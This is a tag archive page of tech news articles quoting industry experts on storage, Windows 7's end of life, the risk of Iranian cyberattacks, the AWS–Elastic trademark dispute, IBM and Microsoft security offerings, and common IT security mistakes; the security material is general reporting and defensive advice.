Tag Archives: experts

Nutanix Objects 2.0 lays groundwork for hybrid cloud

Nutanix pitched its latest Objects update as scale-out object storage workloads, but experts said the hyper-converged infrastructure specialist is likely preparing for a push into the cloud.

Nutanix Objects 2.0 introduced features aimed at big data workloads. The new multicluster support consolidates Nutanix clusters to a single namespace, allowing for simpler, single-console management. Nutanix Objects 2.0 also added a 240 TB node that is larger than any other Nutanix HCI node, allowing more capacity per cluster. The update also added WORM support and Splunk certification.

Nutanix Objects, which launched in August 2019, provides software-defined object storage and is a stand-alone product from Nutanix HCI. Greg Smith, vice president of product marketing at Nutanix, said typical use cases included unstructured data archiving, big data and analytics. He also noticed an uptick in cloud-native application development in AWS S3 environments. Nutanix HCI software uses an S3 interface.

“We see increasing demand for object storage, particularly for big data,” Smith said.

Supporting cloud-native development is the real endgame of Nutanix Objects 2.0, said Eric Slack, senior analyst at Evaluator Group. The new features and capabilities aren’t to capture customers with traditional object storage use cases, because it’s not cost-effective to put multiple petabytes on HCI. He said no one is waiting for an S3 interface before buying into HCI.

However, that S3 interface is important because, according to Slack, “S3 is what cloud storage talks.”

Slack believes the enhancements to Nutanix Objects will lay the groundwork for Nutanix Clusters, which is currently in beta. Nutanix Clusters allows Nutanix HCI to run in the cloud and communicate with Nutanix HCI running in the data center. This means organizations can develop applications on-site and run them in the cloud, or vice versa.

“I think that’s why they’re doing this — they’re getting ready for Nutanix Clusters,” Slack said. “This really plays into their cloud design, which is a good idea.”

Organizations want that level of flexibility right now because they do not know which workloads are more cost-efficient to run on premises or in the cloud. Having that same, consistent S3 interface is ideal for IT, Slack said, because it means their applications will run wherever it’s cheaper.

Some organizations have been burned during cloud’s initial hype and moved many of their workloads there, only to find their costs have gone up. Slack said that has led to repatriation back into data centers as businesses do the cost analysis.

“Cloud wasn’t everything we thought it was,” Slack said.

Scott Sinclair, senior analyst at Enterprise Strategy Group (ESG), came to a similar conclusion about the importance of Nutanix Objects. HCI is about consolidating and simplifying server, network and storage, and Objects expands Nutanix HCI into covering object storage’s traditional use cases: archive and active archive. However, there are growing use cases centered around developing in S3.

“We’re seeing the development of apps that write to an S3 API that may not be what we classify as traditional archive,” Sinclair said.

Screenshot of Nutanix Objects 2.0
Nutanix’s S3 interface streamlines interaction between on premises and cloud.

Citing ESG’s 2020 Technology Spending Intentions survey, Sinclair said 64% of IT decision-makers said their IT environments are more complex than they were years ago. Coupled with other data pointing to skills shortages in IT, Sinclair said organizations are currently looking for ways to simplify their data centers, resulting in interest in HCI.

That same survey also found 24% of respondents said they needed to go hybrid, with the perception that using the cloud is easier. Sinclair said this will logically lead to an increase in the use of S3 protocols, and why Nutanix Objects is uniquely well-positioned. Right now, IT administrators know they need to be using both on-premises and cloud resources, but they don’t know to what extent they should be using either. That’s why businesses are taking the most flexible approach.

“Knowing that you don’t know is a smart position to take,” Sinclair said.

Go to Original Article

Data-driven storytelling makes data accessible

As organizations wrestle with an abundance of data and a dearth of experts in data interpretation, data-driven storytelling helps those organizations make sense of their information and drive their business forward.

Most business intelligence platforms help organizations transform their information into digestible data visualizations. Many, however, don’t give the data context — attempt to explain why sales dropped in a given month, or rose in another, for example.

Some BI vendors — Tableau and Yellowfin, for example — have added data-driven storytelling capabilities.

Narrative Science, a vendor based in Chicago and founded in 2010, meanwhile, is among a group of vendors whose sole focus is data storytelling, offering a suite of tools that give information context. Narrative Science recently introduced Lexio, a tool that turns data into digestible stories and is particularly suited for mobile devices.

 Nate Nichols, vice president of product architecture at Narrative Science, and Anna Schena Walsh, director of growth marketing at the company, co-authored a book on storytelling entitled Let Your People Be People. In the book, published Jan. 6, the authors look at 36 ways storytelling — with a particular emphasis on data-driven storytelling — can help change organizations, improving operations as well as helping employees not trained in data science use data to their advantage.

Nichols and Schena Walsh recently answered questions about data-driven storytelling. Here, in Part I of a two-part Q&A, they discuss the importance of data-driven storytelling. In Part II, they delve into how data-driven storytelling can improve an organization’s operations.

In a business sense, what is storytelling?

Anna Schena WalshAnna Schena Walsh

Anna Schena Walsh: When we think of storytelling at Narrative Science, we spend a lot of time here thinking about what makes a good story because our software is data storytelling, so we’re going from to data to story. What we realized is that the arc of a good story, when it comes to software, also applies to people. No matter where you sit in a business you are a storyteller, whether you are a salesperson, a marketer, an engineer, and at some point in your career you need to be able to tell a good story. Whether it’s to advocate for yourself, to sell a product or other various different ways, that’s an essential skill for everyone to do precisely and to do it well.

Honing in more narrowly on business intelligence and analytics, how do you define data-driven storytelling?

Nate NicholsNate Nichols

Nate Nichols: It’s what Anna said about storytelling and applying it to data. The real shift here is that there’s been this idea that getting to the right number, or doing some analysis and looking at a number or a chart, was sufficient, and that was where the process stopped. You got a number and then it’s an executive’s job to figure out what to go do with that, or someone else’s job to figure out what to go and do with those numbers. I think what our customers are looking at and what the world is waking up to is that the right answer is just the beginning of the problem. You have the right answer, but then the real work is the communication, and that’s the piece — the storytelling part — that can actually change the world and bring people along with you.

No movement was ever led by just stating an answer and then everyone realizing that was right and joining up of their own accord. It’s really telling the story, giving it the cause and effect, the context, the why.
Nate NicholsVice president of product architecture, Narrative Science

No movement was ever led by just stating an answer and then everyone realizing that was right and joining up of their own accord. It’s really telling the story, giving it the cause and effect, the context, the why. With all of the data and analysis that’s out there, you need to still actually do the work of mobilizing it.

How does data-driven storytelling manifest itself — how do you take the information and turn it into a story?

Nichols: One of the key components is using language, so when our system is writing stories it starts with a question from the user. They want to know how their sales pipeline is, how [operations] were last quarter. There are a lot of systems that can answer that — our system can answer that and tell you how many deals were made, but then it goes into a storytelling mode where it gives a reader the context, why this is happening or what else is happening around this — that context becomes really important. It’s cause and effect, and knowing why things are happening becomes super important.

It starts with an answer, and then brings in all those storytelling elements to express things in a way that makes sense to a person. A computer is good at saying, ‘Sales increased 22 percent week over week,’ but a human would say, ‘Sales are doing great,’ or, ‘Sales jumped a lot, sales shot up.’ It may be less numerically precise, but it’s a lot more intuitive and works with our brains better. Our system is adding on that layer, bringing in the context, bringing in the characters, and then doing a lot of work to put that in a single story that someone can sit down and read and has a beginning and an end.

Your book looks at different ways storytelling can be used by businesses — what are some of them?

Schena Walsh: The book looks at 36 different ways you can use storytelling. One is how to tell a better story, and then how to create a storytelling environment, and at then at the end how to use data storytelling to enable you to realize your talent. Here at Narrative Science we have software that surfaces the story and brings the data we need to us, which allows the employees here not to be spending time looking through analytics, and then also gives them the data points they need to tell their own stories as well. So we actually spend a lot of time here training our people to tell their stories. Nate actually leads a storytelling workshop here at Narrative Science, and a lot of the elements of what we teach our employees and our clients is … in the book.

Why do businesses need to improve their data-driven storytelling abilities — what does it enable them to do that they might not otherwise be able to?

Schena Walsh: One big trend I’ve seen is companies leaning into what was previously referred to as soft skills. As you see a lot more automation of tasks happening, these skills have become more and more important. For us, we truly believe that storytelling unlocks incredible potential for companies. We know we need to spend a lot of time with data, we need that information, and data storytelling allows us to be able to able to tell stories about ourselves, about our companies, about our jobs really well and really precisely.

Editor’s note: This interview has been edited for clarity and conciseness.

Go to Original Article

With support for Windows 7 ending, a look back at the OS

With Microsoft’s support for Windows 7 ending this week, tech experts and IT professionals remembered the venerable operating system as a reliable and trustworthy solution for its time.

The OS was launched in 2009, and its official end of life came Tuesday, Jan. 14.

Industry observers spoke of Windows 7 ending, remembering the good and the bad of an OS that managed to hold its ground during the explosive rise of mobile devices and the growing popularity of web applications.

An old reliable

Stephen Kleynhans, research vice president at Gartner, said Windows 7 was a significant step forward from Windows XP, the system that had previously gained dominance in the enterprise.

Stephen KleynhansStephen Kleynhans

“Windows 7 kind of defined computing for most enterprises over the last decade,” he said. “You could argue it was the first version of Windows designed with some level of true security in mind.”

Windows 7 introduced several new security features, including enhanced Encrypting File System protection, increased control of administrator privileges and allowing for multiple firewall policies on a single system.

The OS, according to Kleynhans, also provided a comfortable familiarity for PC users.

“It was a really solid platform that businesses could build on,” he said. “It was a good, solid, reliable OS that wasn’t too flashy, but supported the hardware on the market.”

“It didn’t put much strain on its users,” he added. “It fit in with what they knew.”

Eric Klein, analyst at VDC Research Group Inc., said the launch of Windows 7 was a positive move from Microsoft following the “debacle” that was Windows Vista — the immediate predecessor of Windows 7, released in 2007.

“Vista was a very big black eye for Microsoft,” he said. “Windows 7 was more well-refined and very stable.”

Eric KleinEric Klein

The fact that Windows 7 could be more easily administered than previous iterations of the OS, Klein said, was another factor in its enterprise adoption.

“So many businesses, small businesses included, really were all-in for Windows 7,” he said. “It was reliable and securable.”

Windows 7’s longevity, Klein said, was also due to slower hardware refresh rates, as companies often adopt new OSes when buying new computers. With web applications, there is less of a need for individual desktops to have high-end horsepower — meaning users can get by with older machines for longer.

Mark BowkerMark Bowker

“Ultimately, it was a well-tuned OS,” said Mark Bowker, senior analyst at Enterprise Strategy Group. “It worked, so it became the old reliable for a lot of organizations. Therefore, it remains on a lot of organizations’ computers, even at its end of life.”

Even Microsoft saw the value many enterprises placed in Windows 7 and responded by continuing support, provided customers pay for the service, according to Bowker. The company is allowing customers to pay for extended support for a maximum of three years past the January 14 end of life.

Early struggles for Windows 7

Kleynhans said, although the OS is remembered fondly, the switch from Windows XP was far from a seamless one.

“What people tend to forget about the transition from XP to 7 was that it was actually pretty painful,” he said. “I think a lot of people gloss over the fact that the early days with Windows 7 were kind of rough.”

The biggest issue with that transition was with compatibility, Kleynhans said.

“At the time, a lot of applications that ran on XP and were developed on XP were not developed with a secure environment in mind,” he said. “When they were dropped into Windows 7, with its tighter security, a lot of them stopped working.”

Daniel BeatoDaniel Beato

Daniel Beato, director of technology at IT consulting firm TNTMAX, recalled some grumbling about a hard transition from Windows XP.

“At first, like with Windows 10, everyone was complaining,” he said. “As it matured, it became something [enterprises] relied on.”

A worthy successor?

Windows 7 is survived by Windows 10, an OS that experts said is in a better position to deal with modern computing.

“Windows 7 has fallen behind,” Kleynhans said. “It’s a great legacy system, but it’s not really what we want for the 2020s.”

Companies, said Bowker, may be hesitant to upgrade OSes, given the complications of the change. Still, he said, Windows 10 features make the switch more alluring for IT admins.

“Windows 10, especially with Office 365, starts to provide a lot of analytics back to IT. That data can be used to see how efficiently [an organization] is working,” he said. “[Windows 10] really opens eyes with the way you can secure a desktop… the way you can authenticate users. These things become attractive [and prompt a switch].”

Klein said news this week of a serious security vulnerability in Windows underscored the importance of regular support.

“[The vulnerability] speaks to the point that users cannot feel at ease, regardless of the fact that, in 2020, Windows is a very, very enterprise-worthy and robust operating system that is very secure,” he said. “Unfortunately, these things pop up over time.”

The news, Klein said, only underlines the fact that, while some companies may wish to remain with Windows 7, there is a large community of hackers who are aware of these vulnerabilities — and aware that the company is ending support for the OS.

Beato said he still had customers working on Windows 7, but most people with whom he worked had made the switch to Windows 10. Microsoft, he said, had learned from Windows XP and provided a solid pathway to upgrade from Windows 7 to Windows 10.

The future of Windows

Klein noted that news about the next version of Windows would likely be coming soon. He wondered whether the trend toward keeping the smallest amount of data possible on local PCs would affect its design.

“Personally, I’ve found Microsoft to be the most interesting [of the OS vendors] to watch,” he said, calling attention to the company’s willingness to take risks and innovate, as compared to Google and Apple. “They’ve clearly turned the page from the [former Microsoft CEO Steve] Ballmer era.”

Go to Original Article

Experts weigh in on risk of Iranian cyberattacks against U.S.

The Department of Homeland Security warned of potential of Iranian cyberattacks against the U.S., and security experts weighed in on the risks facing enterprises.

In the bulletin, released Saturday as part of the National Terrorism Advisory System, DHS said there was no indication that attacks from Iran were imminent, but noted the country and its allies “have demonstrated the intent and capability to conduct operations in the United States.” The bulletin was issued in the wake of escalating military conflict with Iran.

“Iran maintains a robust cyber program and can execute cyberattacks against the United States. Iran is capable, at a minimum, of carrying out attacks with temporary disruptive effects against critical infrastructure in the United States,” DHS wrote in the bulletin. “Be prepared for cyber disruptions, suspicious emails, and network delays. Implement basic cyber hygiene practices such as effecting data backups and employing multi-factor authentication [MFA].”

In general, experts agreed there is a legitimate threat of Iranian cyberattacks against U.S. entities and many added that while Iran has offensive cyber capabilities, they are not known to have capabilities on the level of the U.S., China or Russia.

Rick Holland, CISO and vice president of strategy at Digital Shadows in San Francisco, said Iran has proven the ability to cause damage with cyberattacks.

“Iranian offensive cyber capabilities have grown significantly since the days of Stuxnet, which was a catalyst for the Iranian regime to mature their capabilities,” Holland told SearchSecurity. “While Iran isn’t as mature as the United States, Russia or China, they are capable of causing damage. Destructive or wiper malware like Iran used against Saudi Aramco could cause significant damage to their targets.”

Robert M. Lee, CEO and founder of Dragos, said Iran has “consistently been growing their capabilities and are aggressive and willing to be as destructive as they can be.”

“We’re unlikely to see widespread issues or scenarios such as disrupting electric power but it’s entirely possible we will see opportunistic responses to whatever damage they think they can inflict,” Lee told SearchSecurity. “Iran has shown previously to be opportunistic in its targeting of infrastructure with denial of service attacks against banks as well as trying to get access to industrial control systems in electric and water companies. While it is important to think where strategic targets would be for them, it’s just as relevant that they might search for those who are more insecure to be able to have an effect instead of a larger effect on a harder target.”

High disruption value

While DHS was unclear what organizations Iran might target with cyberoperations, some experts tended to agree with Lee that infrastructure and financial targets would be most likely.

Jake Williams, founder and president of Rendition Infosec in Augusta, Ga., classified Iran as having “moderately sophisticated capabilities.”

“They aren’t on par with Russia or China, but they aren’t script kiddies either. Iran will most likely target defense industrial base and financial institutions — basically, targets that have a high disruption value,” Williams told SearchSecurity. “For an enterprise, the things to keep in mind are DDoS and early indicators of compromise for defense industrial base organizations. Of course, Iran could target other verticals, but we assess these to be the most likely initial targets.”

Levi Gundert, vice president of intelligence and risk at Recorded Future, noted that “Iranian sponsored groups are constantly probing potential targets for weaknesses toward intelligence gathering.”

“When provoked, these groups have also successfully demonstrated retaliatory cyberattacks. Based on historical precedent, Iran retaliates with destructive attacks against perceived threatening organizations (e.g. Sands Corporation), or they attack businesses toward achieving economic impact — large American financial service companies (Operation Ababil) and Saudi Aramco are two good examples,” Gundert told SearchSecurity via email. “We believe the most likely targets of cyberattacks remain the United States government, contractors, and partner businesses involved in U.S. regional interests.”

However, Chris Morales, head of security analytics at threat detection vendor Vectra in San Jose, Calif., said “everyone could be at risk” of an Iranian cyberattack.

“While certain industries were targeted in the past for disruption or for data theft, there is no limitation to who could be targeted in an asymmetric attack that involves disruption, misdirection and confusion,” Morales told SearchSecurity. “Earlier state-sponsored Iranian actors stole only basic information, but over the past few years they have been building long-term espionage campaigns. The risk here being in many cases Iranian actors already persist inside networks and it becomes a case of identifying their presence and removing them.”

Holland said the risk of being targeted by Iran would be low for most organizations, but enterprises should perform threat modeling by asking:

  • How do Iranian interests intersect your business?
  • How has historic Iranian targeting/victimology related to your company?
  • How does the Iranian threat stack up against your supply chain?

Protecting your organization

Experts agreed that taking care of the basics is probably the best approach to defend against possible Iranian cyberattacks.

Dr. Chase Cunningham, principal analyst serving security and risk professionals for Forrester Research, suggested enterprises “fix the easy stuff: deploy MFA everywhere; bolster DDoS defense and make sure email security is in place. Other than that, brace for impact and maintain situational awareness.”

Holland said enterprises “shouldn’t have to take any extraordinary measures.”

“Patch operating systems and applications. Disable Microsoft Office macros. Implement application whitelisting. Restrict admin privileges. Disable external-facing Remote Desktop Protocol,” Holland said. “Enable multi-factor authentication for external-facing applications and privileged users. Monitor for malicious domains registrations related to your organization.”

Gundert suggested organizations “take the time to understand Iranian sponsored groups’ historical tools, tactics, and techniques.”

“These groups typically achieve initial unauthorized access through password re-use, phishing, and/or web shells,” Gundert said. “Now is a great time to review and improve security controls for each threat category, as well as visibility into post-compromise activity like the usage of native Windows tools.”

Lee said the best approach is for cybersecurity professionals to “be in a heightened sense of awareness and put the investments they’ve made into people, process, and technology to use.”

“For companies that have yet to make proper investments into the cybersecurity of their business, there is not much that can be done quickly in situations like this,” Lee said. “Companies need to prepare ahead of these moments and these moments and any angst felt should serve as an opportunity to look internally to determine what your plans would be especially for incident response and disaster recovery.”

Go to Original Article

AWS rejects Elasticsearch trademark lawsuit claims

AWS has responded to an Elasticsearch trademark lawsuit with broad denials of its claims, but experts said an eventual settlement is not only likely, but also the best outcome for customers.

The company sued AWS on Sept. 27 on grounds of false advertising and trademark infringement related to AWS’ Open Distro for Elasticsearch, its version of the popular distributed analytics and search engine. Elasticsearch Inc., or Elastic, originated and serves as chief maintainer of the open source project.

AWS, with the participation of Expedia and Netflix, launched Open Distro for Elasticsearch in March. The companies said this move was necessary because Elastic’s version includes too much proprietary code inside the main open source code line. Open Distro for Elasticsearch is fully open source and licensed under Apache 2.0, according to AWS.

The Elasticsearch trademark lawsuit contends that branding for both the original Amazon Elasticsearch Service, which AWS has sold since 2015, and Open Distro for Elasticsearch violates its trademark, and that customers are “likely to be confused as to whether Elastic sponsors or approves AESS [Amazon Elasticsearch Service] and Open Distro.”

AWS filed its response to Elasticsearch’s complaint last week in U.S. District Court for the Northern District of California. The company denies all wrongdoing, demands a jury trial and offers a series of defensive arguments, one being that Elastic trademark infringement claims “are barred at least in part” under the fair use doctrine. Another asserts that Elastic gave AWS a license to use the term “Elasticsearch.”

Overall, AWS’ response to the Elasticsearch trademark lawsuit is fairly boilerplate, said Jeremy Peter Green, a New York-based attorney specializing in trademark law who reviewed it and Elastic’s original complaint.

Click here to read the complaint.

“In the trademark world, different lawyers have different ways of doing this [but] usually law firms just have templates for these,” Green said.

For example, another AWS defense cites the doctrine of unclean hands, a legal concept that means a complainant shouldn’t be awarded relief if they have committed legal breaches of their own in a dispute.

This, too, is standard practice, according to Green. “There’s always a chance that during the discovery process, something will show up,” he said. “You’re just hedging your bets by accusing them of everything.”

Green has been evaluating options for managed Elasticsearch as part of a trademark search engine he plans to develop. AWS does seem to have sowed some consumer confusion, which is the basis of trademark infringement law, Green said.

“I like Elastic’s case here, from the perspective as both an attorney and consumer,” he said. Elastic’s initial complaint calls for treble damages and attorney’s fees, a figure that could be significant if it wins at trial.

Both of these companies have a major incentive to come to some kind of settlement.
Jeremy Peter GreenTrademark attorney

It is likely that the parties will settle, Green added. “I think [Elastic has] a good enough case that it would be silly for [AWS] to throw a lot of money at it.”

Many Elasticsearch users also host their clusters on AWS anyway, which blurs the competitive lines. “Both of these companies have a major incentive to come to some kind of settlement,” Green said.

Experienced enterprise IT buyers are aware of the potential repercussions of intellectual property battles, according to Holger Mueller, an analyst at Constellation Research in Cupertino, Calif. “But ultimately, it is in the interest of the sparring vendors to settle and keep customers going,” he said.

Go to Original Article

IBM Cloud Pak for Security aims to unify hybrid environments

IBM this week launched Cloud Pak for Security, which experts say represents a major strategy shift for Big Blue’s security business

The aim of IBM’s Cloud Pak for Security is to create a platform built on open-source technology that can connect security tools from multiple vendors and cloud platforms in order to help reduce vendor lock-in. IBM Cloud Paks are pre-integrated and containerized software running on Red Hat OpenShift, and previously IBM had five options for Cloud Paks — Applications, Data, Integration, Automation and Multicloud Management — which could be mixed and matched to meet enterprise needs.

Chris Meenan, director of offering management and strategy at IBM Security, told SearchSecurity that Cloud Pak for Security was designed to tackle two “big rock problems” for infosec teams. The first aim was to help customers get data insights through federated search of their existing data without having to move it to one place. Second was to help “orchestrate and take action across all of those systems” via built-in case management and automation. 

Meenan said IT staff will be able to take actions across a multi-cloud environment, including “quarantining users, blocking IP addresses, reimaging machines, restarting containers and forcing password resets.”

“Cloud Pak for Security is the first platform to take advantage of STIX-Shifter, an open-source technology pioneered by IBM that allows for unified search for threat data within and across various types of security tools, datasets and environments,” Meenan said. “Rather than running separate, manual searches for the same security data within each tool and environment you’re using, you can run a single query with Cloud Pak for Security to search across all security tools and data sources that are connected to the platform.” 

Meenan added that Cloud Pak for Security represented a shift in IBM Security strategy because of its focus on delivering “security solutions and outcomes without needing to own the data.”

“That’s probably the biggest shift — being able to deliver that to any cloud or on-premise the customer needs,” Meenan said. “Being able to deliver that without owning the data means organizations can deploy any different technology and it’s not a headwind. Now they don’t need to duplicate the data. That’s just additional overhead and introduces friction.”

One platform to connect them all

Meenan said IBM was “very deliberate” to keep data transfers minimal, so at first Cloud Pak for Security will only take in alerts from connected vendor tools and search results.

“As our Cloud Pak develops, we plan to introduce some capability to create alerts and potentially store data as well, but as with other Cloud Paks, the features will be optional,” Meenan said. “What’s really fundamental is we’ve designed a Cloud Pak to deliver applications and outcomes but you don’t have to bring the data and you don’t have to generate the alerts. Organizations have a SIEM in place, they’ve got an EDR in place, they’ve got all the right alerts and insights, what they’re really struggling with is connecting all that in a way that’s easily consumable.”

In order to create the connections to popular tools and platforms, IBM worked with clients and service providers. Meenan said some connectors were built by IBM and some vendors built their own connectors. At launch, Cloud Pak for Security will include integration for security tools from IBM, Carbon Black, Tenable, Elastic, McAfee, BigFix and Splunk, with integration for Amazon Web Services and Microsoft Azure clouds coming later in Q4 2019, according to IBM’s press release.

Ray Komar, vice president of technical alliances at Tenable, said that from an integration standpoint, Cloud Pak for Security “eliminates the need to build a unique connector to various tools, which means we can build a connector once and reuse it everywhere.”

“Organizations everywhere are reaping the benefits of cloud-first strategies but often struggle to ensure their dynamic environments are secure,” Komar told SearchSecurity. “With our IBM Cloud Pak integration, joint customers can now leverage vulnerability data from Tenable.io for holistic visibility into their cloud security posture.”

Jon Oltsik, senior principal analyst and fellow at Enterprise Strategy Group, based in Milford, Mass., told SearchSecurity that he likes this new strategy for IBM and called it “the right move.”

“IBM has a few strong products but other vendors have much greater market share in many areas. Just about every large security vendor offers something similar, but IBM can pivot off QRadar and Resilient and extend its footprint in its base. IBM gets this and wants to establish Cloud Pak for Security as the ‘brains’ behind security. To do so, it has to be able to fit nicely in a heterogeneous security architecture,” Oltsik said. “IBM can also access on-premises data, which is a bit of unique implementation. I think IBM had to do this as the industry is going this way.”

Martin Kuppinger, founder and principal analyst at KuppingerCole Analysts AG, based in Wiesbaden, Germany, said Cloud Pak for Security should be valuable for customers, specifically “larger organizations and MSSPs that have a variety of different security tools from different vendors in place.”

“This allows for better incident response processes and better analytics. Complex attacks today might span many systems, and analysis requires access to various types of security information. This is simplified, without adding yet another big data lake,” Kuppinger told SearchSecurity. “Obviously, Security Cloud Pak might be perceived competitive by incident response management vendors, but it is open to them and provides opportunities by building on the federated data. Furthermore, a challenge with federation is that the data sources must be up and running for accessing the data — but that can be handled well, specifically when it is only about analysis; it is not about real-time transactions here.”

The current and future IBM Security products

Meenan told SearchSecurity that Cloud Pak for Security would not have any special integration with IBM Security products, which would “have to stand on their own merits” in order to be chosen by customers. However, Meenan said new products in the future will leverage the connections enabled by the Cloud Pak.

“Now what this platform allows us to do is to deliver new security solutions that are naturally cross-cutting, that require solutions that can sit across an EDR, a SIEM, multiple clouds, and enable those,” Meenan said. “When we think about solutions for insider threat, business risk, fraud, they’re very cross-cutting use cases so anything that we create that cuts across and provides that end-to-end security, absolutely the Cloud Pak is laying the foundation for us — and our partners and our customers — to deliver that.”

Oltsik said IBM’s Security Cloud Pak has a “somewhat unique hybrid cloud architecture” but noted that it is “a bit late to market and early versions won’t have full functionality.”

“I believe that IBM delayed its release to align it with what it’s doing with Red Hat,” Oltsik said. “All that said, IBM has not missed the market, but it does need to be more aggressive to compete with the likes of Cisco, Check Point, FireEye, Fortinet, McAfee, Palo Alto, Symantec, Trend Micro and others with similar offerings.”

Kuppinger said that from an overall IBM Security perspective, this platform “is rather consequent.”

“IBM, with its combination of software, software services, and implementation/consultancy services, is targeted on such a strategy of integration,” Kuppinger wrote via email. “Not owning data definitely is a smart move. Good architecture should segregate data, identity, and applications/apps/services. This allows for reuse in modern, service-oriented architectures. Locking-in data always limits that reusability.”

Go to Original Article

Experts on demand: Your direct line to Microsoft security insight, guidance, and expertise – Microsoft Security

Microsoft Threat Experts is the managed threat hunting service within Microsoft Defender Advanced Threat Protection (ATP) that includes two capabilities: targeted attack notifications and experts on demand.

Today, we are extremely excited to share that experts on demand is now generally available and gives customers direct access to real-life Microsoft threat analysts to help with their security investigations.

With experts on demand, Microsoft Defender ATP customers can engage directly with Microsoft security analysts to get guidance and insights needed to better understand, prevent, and respond to complex threats in their environments. This capability was shaped through partnership with multiple customers across various verticals by investigating and helping mitigate real-world attacks. From deep investigation of machines that customers had a security concern about, to threat intelligence questions related to anticipated adversaries, experts on demand extends and supports security operations teams.

The other Microsoft Threat Experts capability, targeted attack notifications, delivers alerts that are tailored to organizations and provides as much information as can be quickly delivered to bring attention to critical threats in their network, including the timeline, scope of breach, and the methods of intrusion. Together, the two capabilities make Microsoft Threat Experts a comprehensive managed threat hunting solution that provides an additional layer of expertise and optics for security operations teams.

Experts on the case

By design, the Microsoft Threat Experts service has as many use cases as there are unique organizations with unique security scenarios and requirements. One particular case showed how an alert in Microsoft Defender ATP led to informed customer response, aided by a targeted attack notification that progressed to an experts on demand inquiry, resulting in the customer fully remediating the incident and improving their security posture.

In this case, Microsoft Defender ATP endpoint protection capabilities recognized a new malicious file in a single machine within an organization. The organization’s security operations center (SOC) promptly investigated the alert and developed the suspicion it may indicate a new campaign from an advanced adversary specifically targeting them.

Microsoft Threat Experts, who are constantly hunting on behalf of this customer, had independently spotted and investigated the malicious behaviors associated with the attack. With knowledge about the adversaries behind the attack and their motivation, Microsoft Threat Experts sent the organization a bespoke targeted attack notification, which provided additional information and context, including the fact that the file was related to an app that was targeted in a documented cyberattack.

To create a fully informed path to mitigation, experts pointed to information about the scope of compromise, relevant indicators of compromise, and a timeline of observed events, which showed that the file executed on the affected machine and proceeded to drop additional files. One of these files attempted to connect to a command-and-control server, which could have given the attackers direct access to the organization’s network and sensitive data. Microsoft Threat Experts recommended full investigation of the compromised machine, as well as the rest of the network for related indicators of attack.

Based on the targeted attack notification, the organization opened an experts on demand investigation, which allowed the SOC to have a line of communication and consultation with Microsoft Threat Experts. Microsoft Threat Experts were able to immediately confirm the attacker attribution the SOC had suspected. Using Microsoft Defender ATP’s rich optics and capabilities, coupled with intelligence on the threat actor, experts on demand validated that there were no signs of second-stage malware or further compromise within the organization. Since, over time, Microsoft Threat Experts had developed an understanding of this organization’s security posture, they were able to share that the initial malware infection was the result of a weak security control: allowing users to exercise unrestricted local administrator privilege.

Experts on demand in the current cybersecurity climate

On a daily basis, organizations have to fend off the onslaught of increasingly sophisticated attacks that present unique security challenges in security: supply chain attacks, highly targeted campaigns, hands-on-keyboard attacks. With Microsoft Threat Experts, customers can work with Microsoft to augment their security operations capabilities and increase confidence in investigating and responding to security incidents.

Now that experts on demand is generally available, Microsoft Defender ATP customers have an even richer way of tapping into Microsoft’s security experts and get access to skills, experience, and intelligence necessary to face adversaries.

Experts on demand provide insights into attacks, technical guidance on next steps, and advice on risk and protection. Experts can be engaged directly from within the Windows Defender Security Center, so they are part of the existing security operations experience:

We are happy to bring experts on demand within reach of all Microsoft Defender ATP customers. Start your 90-day free trial via the Microsoft Defender Security Center today.

Learn more about Microsoft Defender ATP’s managed threat hunting service here: Announcing Microsoft Threat Experts.

Go to Original Article
Author: Microsoft News Center

DerbyCon panel discusses IT mistakes that need to stop

A panel of experts at DerbyCon discussed common IT mistakes that they don’t want to see happen anymore and offered some suggestions on how to avoid risks.

The talk broke down the IT mistakes the panelists thought needed to stop, ranging from basic security issues to more technical problems. The panelists included Lesley Carhart, principal threat analyst at Dragos Inc.; Chelle Clements, web content developer at Online Marketing and Publishing; April Wright, an application security architect; and Amanda Berlin, senior security architect at Blumira and CEO of Mental Health Hackers.

As the discussion went on, themes began to surface around education, communication and empowering users. Wright and Clements were advocates for not just better educating users, but finding ways to make that education more personal.

Wright focused on IT mistakes like oversharing on social media. She said oversharing can easily become a problem for enterprises, because all of that data can be used to spear-phish users and potentially gain access to a company network. 

“One thing that can be done to curb oversharing is to train users how to protect their families and themselves outside of work. Users need to understand what they’re doing and how it impacts others,” Wright said. “Learning to protect themselves will make them more aware and better advocates. If security isn’t personal to them, they won’t care, because they don’t care about your data; they care about their data.”

Clements agreed and cautioned users against oversharing on social media, as it “eventually comes back to bite them in the ass.”

She also added that basic security concerns are still an issue, including using bad passwords, visiting shady websites, opening email messages from unknown senders and clicking links within those messages.

Clements said finding better training methods is a must. She described security training that she set up over the years, including one-on-one sessions when possible, because “you may need a unique language to explain something. The way you explain something to a physicist will be different than a chemist.”

Wright added that there needs to be better training around the limitations of security products, because IT mistakes can come from users trusting products too much.

“A lot of people feel like they’re more protected than they really are. We [need to] teach them about the failings of what the technology is that’s designed to protect them,” Wright said. “The blinky boxes are great, but it’s really education that’s going to solve the problems of the users. It’s not putting in a bunch of things to protect them, like putting them in a rubber room. It’s teaching them that things are sharp and things are hot, and they shouldn’t touch them.”

Berlin added that these types of IT mistakes can happen with administrators, as well, who might not understand that a security product is “not a magic solution that you can just install and you’re done,” including not configuring products after installing them.

“It’s an ongoing process that you have to keep revisiting. If you have an MSSP [managed security services provider] or you’re doing it internally, that’s going to be someone’s full-time job. It’s something that you need to treat less of a project and more of an ongoing thing,” Berlin said. “Work closer with your security vendors and all your other vendors. They’re usually there to help you, and you are paying them. Keep them accountable. Actually work through the implementation, and make sure they’re continuously working on it and they don’t install it and forget it, as well.”

Beyond educating users, Carhart said IT staff needs to stop expecting security products to be perfect, because they are all just deterrents and, “ultimately, everybody is going to be vulnerable to phishing or a breach.”

“If you have a house, you put a door on that house, and that deters neighborhood kids from walking in. You put on a deadbolt, and that deters the casual thief. Then, maybe you put in an alarm system, and that deters the more dedicated [thieves]. But if someone is paying $10,000 to hire a hit man to kill you? Guess what that hit man is doing? He’s coming in and killing you. You’re going to die. I’m sorry,” Carhart said. “Security is like that. We add defense in depth, and we deter and deter, but people have to understand that you have to plan for that worst-case scenario.”

Empowering users

Carhart noted that many IT mistakes stem from users not feeling empowered to speak up, especially if they feel embarrassed after making a mistake. She said users need to be comfortable demanding better security and privacy from vendors, and be sure to speak up when the IT staff is asking for too much.

